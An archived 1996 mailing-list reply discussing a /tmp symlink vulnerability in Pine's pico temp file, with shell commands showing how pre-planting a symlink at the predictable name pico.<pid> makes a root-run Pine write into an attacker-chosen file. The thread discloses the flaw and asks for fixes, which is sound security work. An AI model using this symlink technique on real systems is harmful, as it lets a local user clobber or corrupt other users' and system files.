On Thu, 12 Sep 1996, Pascal A. Dupuis wrote:
> I tried with my system, running Pine3.95 on Linux 2.0.18.
> A) I started composing a message, invoqued the alternate editor (with
> Linux and a french keyboard, the command is ^), ??? ). From another login
> name, I do :
> cd /tmp
> ln -s pico.pid hacker.tmp
> more hacker.tmp -> permission denied !
> B) I started the other way :
> first, from the other login
> ln -s hacker.tmp pico.pid
> Then, start composing a message. Invoquing the alternate command resulted
> in the error message : "Problem creating pico temp file", and I was unable
> to use the alternate editor.
> On the Linux system, the /tmp/pico.pid file is created 600, owned by the
> Pine user. At first glance, this should be safe, isn't it ?
>
No.
I run it on PINE 3.91 ... see on ... (sorry, I runned it as root ;)
root_at_galadriel:/tmp# ln -s t pico.238
root_at_galadriel:/tmp# touch t
root_at_galadriel:/tmp# chown 666 t
root_at_galadriel:/tmp# ls -l
lrwxrwxrwx 1 root root 1 Sep 12 22:00 pico.238 -> t*
-rw-rw-rw- 1 root root 0 Sep 12 22:01 t*
(runned pine (with ranaur) ... answering this message and ^_ to
it ... ;)
so ... abracadabra ...
-rw-rw-rw- 1 root root 2366 Sep 12 22:06 t
Well ... it's a problem ... if the evil guy is smart enough he
can check the root running pine and trash a file in the system ... (the
odds are few, but , let me be paranoid ;) )
Any sugestions?
Ainur ‰a Valar!
Ranaur
. . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . Ranaur, the Elven Warlock ! . . . . . .
. . E-mail ranaur_at_rdc.puc-rio.br ranaur_at_usa.net . .
. . Look! . http://venus.rdc.puc-rio.br/ranaur/ . .
. . . . . . . . . . . . . . . . . . . . . . . . . .
Received on Sep 12 1996
Intro
